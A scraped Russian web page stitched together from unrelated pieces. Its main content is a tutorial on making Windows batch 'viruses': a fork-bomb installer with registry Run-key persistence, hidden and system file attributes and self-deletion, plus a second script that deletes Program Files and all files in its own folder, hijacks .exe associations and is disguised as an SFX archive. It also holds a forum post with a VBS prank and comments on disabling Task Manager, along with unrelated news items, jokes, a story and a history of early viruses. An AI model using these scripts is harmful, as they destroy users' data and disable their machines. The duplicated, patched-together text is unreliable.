Как создать компьютерный вирус

Обновлено: 06.07.2024

Создание самых простых вирусов не требует наличия специальных сред для разработки программ. И особых знаний, кстати, тоже. Создать вирусы довольно просто, если использовать для этого командную строку. Для этого нужно немного знать синтаксис командной строки и уметь создавать .bat-файлы.

Что такое .bat-файл и как его создать?

Если очень поверхностно, то это файлы с расширением .bat. Такие файлы несут в себе команды, которые должны быть выполнены командным интерпретатором Windows. Все те команды, которые можно выполнить в окне командной строки, можно вписать в .bat-файл и запустить. Результат будет одинаковым.

Чтобы создать .bat-вирус, нам нужен обычный текстовый редактор. В идеале подойдет для этих целей Блокнот. Создав и открыв новый текстовый документ, Вам нужно вписать туда тот код(команды), которые он должен выполнить. После этого, Вам нужно с помощью меню Сохранить как сохранить этот файл, задав ему какое-либо имя с расширением .bat и указав тип файла Все файлы.

Создаем простейший вирус

В данной статье мы рассмотрим создание вируса, который после своего запуска будет бесконечно открывать окно командной строки. Бесконечно и очень быстро открывающиеся окна командной строки не дадут пользователю спокойно работать. Закрыть их всех не успеет никто и очень скоро они забьют оперативную память компьютера, что в свою очередь сильно затормозит работу компьютера, вплоть до полного зависания. Выглядеть это будет приблизительно так:

Вдобавок, мы закинем наш вирус в автозагрузку, что обеспечит автоматический запуск вируса вместе с операционной системой.

Код создаваемого вируса

Сколько программистов, столько разных решений можно придумать для каждой задачи. Я приведу один из своих методов решения такой задачи.

[code]md c:\papka
echo start c:\papka\virus.bat>c:\papka\virus.bat
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v virus /d c:\papka\virus.bat
attrib +r +h +s c:\papka
attrib +r +h +s c:\papka\virus.bat
start c:\papka\virus.bat
del %0[/code]

А теперь разберем сам код. Первая строчка создает папку с именем papka в корне диска C:/. Такой адрес приведен только для примера. Использование же корня папки C:/ не совсем хороший вариант для вируса. Если Вы хотите обеспечить хорошую выживаемость Вашему вирусу, лучше всего спрятать его подальше. Первую команду можно даже пропустить, если Вы закинете сам вирус в уже созданную директорию.

Вторая строчка создает файл c:\papka\virus.bat и, с помощью команды echo, вписывает в него команду start c:\papka\virus.bat. Тут нужно знать, что после знака > указывается место вывода приведенной команды. Тут Вам нужно познакомится: c:\papka\virus.bat и есть основное тело вируса. Созданный нами .bat-файл с кодом, который мы сейчас разбираем, является всего лишь установщиком нашего основного вируса. Вы можете использовать другое название и другое местоположение для вируса.

Третья строчка закидывает созданный нами во второй строчке тело вируса в автозагрузку. Для этого используется пользовательская ветка реестра, так как к ней у пользователя всегда есть доступ. А вот использовать автозагрузку компьютера не безопасно, так как пользователь может не иметь административного доступа, что вызовет ненужную ошибку.

Четвертая и пятая строка кода изменяют атрибуты вируса и папки, где хранится вирус. Данными командами, а для этого используется команда attrib, мы добавляем атрибуты Только чтение, Скрытый и Системный и для папки, и для вируса. Использование атрибута r(Только чтение) необязательно. А вот атрибуты Скрытый и Системный хорошо защитят созданный нами вирус. Если не верите, то почитайте статью про вирус, который превращает папки на флешке в ярлыки. Он использует именно эту технологию.

6-ая строчка кода запускает наш вирус. Вы можете пропустить этот пункт, если хотите, чтобы первый запуск вируса произошел только после перезагрузки компьютера.

И, наконец-то, последняя, 7-ая строчка удаляет данный .bat-вирус. Это полезно, так как по этому .bat-файлу можно спокойно выйти на созданный нами вирус и удалить его.

Смысл созданного вируса

Смысл вируса, который уместился в эти 7 строк — создать основной вирус, защитить его и обеспечить его постоянную работу. А так же подмести свои следы. А что делает основной вирус? После запуска основного вируса, он выполняет ту команду, которая вписана в нее. А это команда, в свою очередь, запускает наш вирус, который опять-таки снова запускает самого себя. И так до бесконечности.

Как бороться с такими вирусами?

Во-первых, начало борьбы с данным вирусом начнется после того, как он запуститься. Очень скоро вирус заполнит своими копиями оперативную память и Вы даже мышкой шевельнуть не сможете. Поэтому, такой спектакль нужно пресекать сразу. Для этого прекрасно подойдет кнопка Break на клавиатуре. Жмите ее столько, сколько понадобится, чтобы новые копии перестали создаваться. На клавиатурах без кнопки Break, может помочь сочетание клавиш Ctrl+C.

Как удалить такой вирус?

Вы можете найти и удалить вирус через его запись в автозагрузке(подробнее по ссылке). А так же Вы можете выйти на вирус по команде, которая будет высвечиваться в окне командного интерпретатора. Естественно, если Вы сможете добраться до скрытого и системного файла. Вот таким образом происходит создание простого вируса.

Здравствуйте! В этом посте (первом) я покажу, как создавать вирус шутку через блокнот. Сразу прошу не бомбить и не писать гневные комменты типа: "Да такого миллион!", "Да что ты знаешь!", "Да пошел ты в жопу!" и т.д. Да, я знаю, что эти "вирусы" создавали давно. Но я к примеру открыл для себя это совсем недавно. Месяца 3 назад.

Ближе к делу: я буду рассказывать что эта шутка вообще делает, буду вставлять скрины и все объяснять. Напомню, это ознакомительный пост! В других постах я буду конкретно писать, как создать такой-то вирус.

Вирус-шутка это программа, которую создают в блокноте. Т.е. пишешь там команды и сохраняешь их определенных форматах. Если все правильно сделано, без ошибок, то вирус-шутка сработает. Кстати, "вирус-шутка" это условное название. В блокноте можно создать и игру, и крестики нолики, часы.

ПРЕДУПРЕЖДЕНИЕ. Перед созданием вируса отключите Анти-Вирус.

1) Создание вируса: Для начала откройте блокнот.

2) В блокноте начинайте писать команду. Для начала скопируйте этот текст туда:

msgbox"Ты не против, если я буду жить у тебя в компе?",32+4,"Вопрос"

msgbox"Ок, ты не против",64,"Я понял"

msgbox"Это шутка, это НЕ вирус :) ХАХАХАХА",64,"Я пошутил"

msgbox"Или же нет. ",64,". "

Я НЕ ЖЕЛАЮ ВАМ ЗЛА! ЭТОТ ВИРУС НЕ МОЖЕТ ПРИНЕСТИ ВАМ И ВАШЕМУ КОМПУ ВРЕДА!

3) Сохраните ваш текст в формате .vbs Смотрите далее.

4) Теперь у вас на Рабочем столе должен появиться вот такой значок:

5) Заходите в него.

6) У вас должен открыться вирус-шутка. Если же не работает, то два варианта: либо у вас включен Анти-Вирус, либо ваш комп не поддерживает это.

7) НЕ ПУГАЙТЕСЬ! ВИРУС-ШУТКА НЕ ПРИНЕСЕТ ВРЕДА. Теперь вам осталось читать то, что там написано, и кликать по кнопкам (любым).

Вы можете изменить в команде вируса текст. Например вместо "Windows удалить?" можно написать "ставьте лайки!". Удачи вам, экспериментируйте со своими вирусами!

И так, как я обещал, это был ознакомительный пост. Вскоре я выложу пост, где подробно опишу все значения, как все делать и т.д. Отпишитесь в тапках как вам мой пост, киньте скрины своего вируса. Мне будет интересно :D

сука! у меня винда удалилась!

ТС, у вас тоже снегопад? Занятия в школах отменили?

Мне хочется узнать все подробно как это работает что обозначает msgbox, цифры 64; 32+4

VBA макрос еще бы присобачил в виде екселя, что бы кошмарил тупыми вопросами!

сохранить как .bat

можно в конце команду shutdown -s -t nponиcatь

также можно сделать чтобы он не закрывался

а если уже не шутка то можно оффнуть диспетчер задач команда

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /f /v "DisableTaskMgr" /t REG_DWORD /d 0

Да куйня какая-то. Особенно для тех кто юзал ХП без еще сервис пака, когда на клик по банеру открывалось 100500 окон с голыми бабами и флаерами " ПАПА иьет ДОЧКУ. ", или "МАМА отсосала у СЫНА. "

Друзья, напишите то, как я объяснял. Понятно или нет.

Школьник добрался до учебников? Похвально, но баян.

Законопроект

В госдуму внесён законопроект о запрете СМИ упоминать национальность преступников. Поэтому теперь вы никогда не догадаетесь, кто именно на свадьбе стрелял в воздух.

У расчленёнки нет региональной принадлежности!

Когда запретили указывать национальность преступника

Как вас теперь называть?

Законопроект запрещающий СМИ сообщать национальность

Внезапное

Усман Нурмагомедов опознан как водитель

“Рокировочка по-братски” не прокатила, Камал Идрисов направлен в СИЗО до 11 января, ему грозит 10 лет тюрьмы.

Попытка брата Хабиба Нурмагомедова, бойца Bellator Усмана Нурмагомедова, уйти от ответственности за наезд на полицейского, возможно, провалилась. Все дело в том, что стоявшие на посту у Каспийского аэропорта сотрудники правопорядка узнали в водителе, сбившем одного из них на КПП, Усмана Нурмагомедова. Об этом сообщает телеграм-канал SHOT.

Автомобиль преступников был полностью тонирован, но в момент проезда через КПП боковое окно со стороны водителя было открыто, и сотрудники по фото опознали, что за рулем сидел именно Усман Нурмагомедов. Эту информацию полицейские внесли в протокол следователя по делу.

Теперь для Усмана и его друга Камала Идрисова ситуация серьезно осложнилась, так как к ДТП и оставлению места наезда на полицейского потенциально добавилось лжесвидетельствование. Ведь ранее приятели заявили, что за рулем находился Камал, а Усман спал на заднем сиденье после тренировки. Ну и прицепом там идет рассказ про то, что ребята очень торопились и решили, что не сбили человека, а слегка задели его зеркалом. А после они поменялись местами и за руль сел уже Усман - просто так захотелось.

Сейчас следователи изучают видео с камер наблюдения, чтобы точно установить водителя. Камала же после получения новых данных из-под домашнего ареста перевели в СИЗО, где он будет находиться до 11 января. СМИ утверждают, что ему грозит до 10 лет тюрьмы.

Лучшие моды

Взято из просторов телеграмма.

Думал пирожком отделаешься?

Воспоминания

Спасибо, не надо

Ответ на пост «Миллионы американцев отказываются работать, назревает глобальное восстание среднего класса»

Проучил

Целевая аудитория

Вчера наша команда по любительскому мини-футболу избежала поражения, и на последних минутах тренировки сравняла счёт. На радостях мы командой решили попить кофе в ближайшем кафе. Коллектив у нас разного возраста, и по большому счёту, мы друг друга почти не знаем. Только имена и марку машины. Например, Андрей на белой Королле.

Сидим, общаемся, и разговор заходит про профессии. Юра на синем Туареге говорит:

Юрий помолчал, а потом продолжил.

- С этой работой я никогда не думал, что так пристально буду следить за прогнозом погоды! Когда в прогнозе я видел эту чёртову снежинку…

Все с сочувствием и поддержкой слушали его. Самый старший из нас, мужчина лет пятидесяти, Максим на сером Прадике, сказал:

- Понимаю. Я в частном доме живу!

Продолжил молодой Андрей на белой Королле:

- Студентом завалил три экзамена. Взял академ. Надо было чем-то полгода заниматься. Устроился торговать синтезаторами. Небольшой отдел в торговом центре. Скучнее в жизни больше ничем не занимался. Через пару дней работы я понял, что эти синтезаторы на фиг никому не нужны. Ну вот, скажите, вы часто покупаете синтезаторы?

За столиком все молчали. Возрастной Максим, что-то хотел произнести, но промолчал. Андрей продолжил.

- Вот! Я просто сидел, окружённый синтезаторами, целыми днями и ничего не делал. Хозяин этого отдела был очень странный тип. Он запрещал мне читать, лазить в телефоне. Я должен был просто сидеть и улыбаться! Более того, хозяин каждый вечер стал отчитывать меня за то, что за день не было продаж. В какой-то момент перестал здороваться даже! Думаю, валить надо от этого чокнутого. Ща получу зарплату за месяц и уволюсь. А если не заплатит?!

Максим на сером Прадике неожиданно сказал:

- Я вспомнил, откуда мне лицо твоё знакомо! Я у тебя синтезатор так купил! Помнишь меня?! С бутылкой пива такой и с чипсами? Я еще тебя ими угостил.
- Что-то припоминаю. Ну как, жалеешь?
- Нет! Это самая лучшая покупка в моей жизни! Я-то не играю… Дочь увлеклась. Играть научилась, поёт. К компу подключила его. Что-то там сводит. Спасибо тебе!
- Не за что! Главное, правильно угадать с целевой аудиторией!

Приходилось ли вам хотя бы раз в жизни сталкиваться с компьютерным вирусом? Сейчас большинство антивирусных программ уведомляют вас о том, что скачивание того или иного файла может быть небезопасным для вашего компьютера. Мы решили разобраться, кто же придумал самый первый компьютерный вирус в мире и для чего?

Безобидное вирусное ПО

Сведения о самом первом появлении вредоносных программ приходятся на 1970-ые годы. Самыми популярными вирусами того времени считались Cookie Monster, Animal и Creeper. Но они несли для пользователей скорее раздражающий характер, нежели вредоносный или разрушительный. По сути, это были обычные игры и ничего более.

Cookie Monster

А вот компьютерный вирус Animal был своего рода файловым червем. Изначально эта игра заключалась в угадывании пользователем животных. Стоит отметить, что Animal вел собственную базу данных и каждый раз вносил в нее необходимые корректировки, если ответы другого пользователя отличались от уже имеющихся.

Идея так понравилась людям, что они стали просить разработчика Джона Уолкера записать программу на магнитную ленту и прислать ее по почте. Но вскоре бесконечное копирование игры утомило Уолкера и он решил дописать программу.

Так появился файловый червь Pervade, который запускался как отдельный процесс и сканировал каталоги на предмет наличия Animal. Если ему не удавалось обнаружить игру, то он записывал ее туда, и пользователи данного устройства могли без проблем в нее играть.

Вредоносная самоперемещающаяся программа Creeper уже стала чем-то более серьезным в мире компьютеров. Разработчик Боб Томас написал программу, которая рандомно гуляла по сети. Ее отличительной чертой было то, что она копировалась на новый компьютер, удаляясь со старого.

Но поймать Creeper было непросто. Для этого программистам понадобилось создать еще одну похожую программу Reaper. Она также перемещалась по сети, но находилась в постоянном поиске вредоносного ПО. Задачей Reaper было найти и уничтожить Creeper. На тот момент Reaper выступала в качестве антивируса.

Прототипы компьютерных вирусов

А вот самым первым настоящим компьютерным вирусом можно считать Elk Cloner. Стоит отметить, что это вредоносное ПО было написано для компьютеров Apple II 15-летним школьником Ричардом Скрентом в 1981 году.

После загрузки компьютера с зараженной дискеты компьютерный вирус копировался и впоследствии наблюдал за доступом к дискам. Если в компьютер вставляли незараженную дискету, то Elk Cloner тут же копировался на нее и распространялся дальше. В остальном вирус никак не влиял на работу компьютера.

Но после каждой 50-ой загрузки Elk Cloner выводил на экран пользователя безобидный стишок про свою индивидуальность и уникальность. Стоит отметить, что вирус распространялся довольно медленно, потому что фактически жил на дискетах.

Вирус передавался через дискеты путем его копирования в загрузочный сектор. В это же время вся старая информация помечалась как поврежденная и переносилась в другой сектор дискеты. Помимо замедления работы носителя Brain также заполнял собою память. Отличительной чертой вируса стало то, что в нем содержались контактные данные разработчиков. После многочисленных звонков от пользователей братья Альви осознали, что создали не помощника, а вредителя.

Червь Морриса

В 1988 году аспирант Корнеллского университета Роберт Таппан Моррис создал первого в мире сетевого червя, который распространялся через интернет. На начальном этапе заражению был подвержен сервер Массачусетского университета. Червь Морриса был первым вирусом, получившим свою известность благодаря вниманию СМИ. Кроме того, за свою разработку Роберт был осужден на законодательном уровне.

Хакеры того времени считали Червь Морриса великим, потому что эпидемия поразила около 6 тысяч узлов компьютерной сети ARPANET. На тот момент ARPANET (Advanced Research Projects Agency Network) была прототипом нашего сегодняшнего интернета. Для того чтобы нейтрализовать компьютерный вирус в Калифорнийский университет в Беркли были приглашены лучшие специалисты по кибербезопасности того времени.

Умный червь Морриса сканировал компьютер и определял, является ли тот инфицированным. После этого он случайным образом с определенной периодичностью выбирал, необходимо ли перезаписывать существующую копию самого себя. Так или иначе червь Морриса перезаписывался.

Но небольшая логическая ошибка в коде стала фатальной и привела к разрушительным последствиям. Размножение червя каждый раз замедляло работу компьютера все больше и больше. Это происходило до тех пор, пока машина окончательно не выходила из строя. Кроме того, червя Морриса было сложно обнаружить, потому что умный компьютерный вирус использовал маскировку. Чтобы скрыть свое присутствие он каждый раз переименовывал свои действия и удалял исполняемый файл.

По задумке Роберта, вирус должен был инфицировать только те компьютеры, у которых стояла операционная система SunOS 3 или 4BSD. Но портируемый код позволил запускаться червю и на других компьютерах. Ущерб, который нанесла вредоносная программа, был оценен почти в $97 млн.

Сам код червя был настолько искусно законспирирован, что шансов найти виновника практически не было. Но отец Морриса посоветовал сыну во всем сознаться. В итоге родителю первого в мире компьютерного вируса грозил штраф в размере $250 тыс. и 5 лет лишения свободы. Однако суд приговорил Роберта к 400 часам общественных работ, 3 годам условно и $10 тыс. штрафа.

После червя Морриса были выработаны специальные меры компьютерной безопасности, а также введены защитные пароли. Но сейчас эти методы не являются эффективными против возникновения новых компьютерных вирусов.

ILOVEYOU – еще один пример вируса массового поражения. Его также называли вирусом любви или LoveLetter. В 2000 году этот любвеобильный компьютерный вирус поразил более 3 млн. машин на операционной системе Windows.

Изначально ILOVEYOU рассылался по электронной почте. Пользователь открывал письмо и смотрел вложение в виде обычного файла с расширением .txt, под которым был замаскирован компьютерный вирус.

После открытия LoveLetter рассылал копию самого себя всем контактам, которые мог найти на данном компьютере и таким образом распространялся дальше. Кроме того, вирус любви совершал вредоносные изменения в системе.

Ущерб, нанесенный мировой экономике от червя ILOVEYOU, был оценен в $10 млрд. Помимо прочего, компьютерный вирус внесли в Книгу рекордов Гиннеса как самый разрушительный из всего вредоносного программного обеспечения.

Интересно будет упомянуть, что эксперт по компьютерной безопасности, составивший технический анализ червя RTM и известный свой фанатичной ненавистью к хакерам, сам подвергся атаке двух хакеров, которые через какую-то элементарную ошибку получили доступ к его машине и вытащили оттуда пароль к известной тогда шифровальной программе

Неопасный резидентный dos-вирус

Иногда выводит на экран “романтическую балладу”:

Le voyage de condom

Плывут неспешно по Москве-pеке.

В воде их ловят коопеpативы

И сушат за углом невдалеке

И снова пpодают,и будут долго

Пpепятствовать pождению детей…

Но в сpок положенный впадают в Волгу

Буpжуйских избежавшие сетей.

Их pыбы жpут,их чайки жpут,и вскоpе

Сдыхают от закупоpки кишки…

Но уцелевшие впадают в моpе,

Качаясь на волнах,как поплавки.

Нептун колеблет зыбкие глубины,

И гонит тучи по небу Боpей…

О,сколько их,изделий из pезины,

Поглотят бездны мpачные моpей!

Но,по волнам скитаясь непpестанно

Не всем тонуть – кому-то и всплывать…

Один из них достигнет океана

И станет вокpуг света дpейфовать…

И будет путь его теpнист и долог,

И в ночь,когда муссонный ливень льет,

Его поймает тpалом ихтиолог,

Что пятый день,не пpосыхая,пьет.

И внятный голос музы он услышит,

И,ощущая твоpческий поpыв,

Сейчас же диссеpтацию напишет

На тему:”Контpацепция у pыб”.

Законопроект

У расчленёнки нет региональной принадлежности!

Когда запретили указывать национальность преступника

Как вас теперь называть?

Законопроект запрещающий СМИ сообщать национальность

Внезапное

Усман Нурмагомедов опознан как водитель

“Рокировочка по-братски” не прокатила, Камал Идрисов направлен в СИЗО до 11 января, ему грозит 10 лет тюрьмы.

Лучшие моды

Взято из просторов телеграмма.

Думал пирожком отделаешься?

Воспоминания

Спасибо, не надо

Ответ на пост «Миллионы американцев отказываются работать, назревает глобальное восстание среднего класса»

Проучил

Целевая аудитория

Сидим, общаемся, и разговор заходит про профессии. Юра на синем Туареге говорит:

Юрий помолчал, а потом продолжил.

- Понимаю. Я в частном доме живу!

Продолжил молодой Андрей на белой Королле:

За столиком все молчали. Возрастной Максим, что-то хотел произнести, но промолчал. Андрей продолжил.

Максим на сером Прадике неожиданно сказал:

Не думайте, пожалуйста, что знания о том, как пишутся вирусы, нужны только вирусописателям! В целях компьютерной безопасности они не менее важны и простым пользователям. Даже поверхностное понимание того, как написать вирусы в блокноте, поможет защитить компьютер от многих неприятностей.

Пишем вирус в блокноте

Вместо telnetdrive.bat попробуйте вписать безопасные команды для запуска: Calc (калькулятора), Taskmgr (диспетчера задач) или Mspaint (программы рисования)

С чего начать

Пришло время изучить небольшую общую инструкцию по «изготовлению» таких файлов.

Первым делом открываем блокнот;
Заносим туда команды, т.е. создаём в нём «тело» вируса;
Сохраняем свой труд через Файл -> Сохранить как;
Теперь осталось изменить расширение файла .txt на .bat и, вместо сохранённого названия, вписать нужное, которое будет использоваться.

Создаём первый файл-вирус

Простой вирус написан и сохранён в файл. Теперь бы неплохо узнать, что же прописали в тело вируса, сохранённого в файле.

Начинаем разбираться по порядку с первой строки:

@Echooff – без этой команды всё, что написано, высвечивалось бы на экране монитора.
Date11.14 – указывает на дату создания.
Ifexistc:sky.batgotoabc – проверка существования на диске С файла sky.bat и если его нет
Copy %0 c:sky.bat – размножает себя, изменив первоначальное имя файла на sky.bat
Attrib +hc:sky.bat – скрывает созданный файл от посторонних глаз.
Echoc:sky.bat >>autoexec.bat – вирус прописывается в автозагрузку.
:abc – если он есть, выполнение программы перейдёт сюда.

Далее идут небольшие шалости:

mdCRECK – создаёт нужную или ненужную папку, смотря какая цель у создателя вируса.
mdNEW – такими папками можно заполнить весь жёсткий диск у пользователя.
LabelE:LUZER – прописывает название логического диска Е. В данном случае LUZER.
assoc .exe=.mp3 – расширение .exe будет ассоциироваться, как .mp
del c:Program Files /q –всё, что было в папке Program Files удалится.
del *.* /q – из каталога, где находится вирус, удалится всё, кроме папки с самим вирусом.

Повеселились достаточно, подумаем и о законе:

Осталось последнее, узнать, как же его прячут. Просто! Переформатируют файл из расширения .bat в .exe при помощи архиватора WinRAR. При создании архива помечают – «Создать архив SFX» и устанавливают отметку «Выполнить после распаковки». Естественно, указывают настоящее имя, под которым создан вирус.

Читайте также: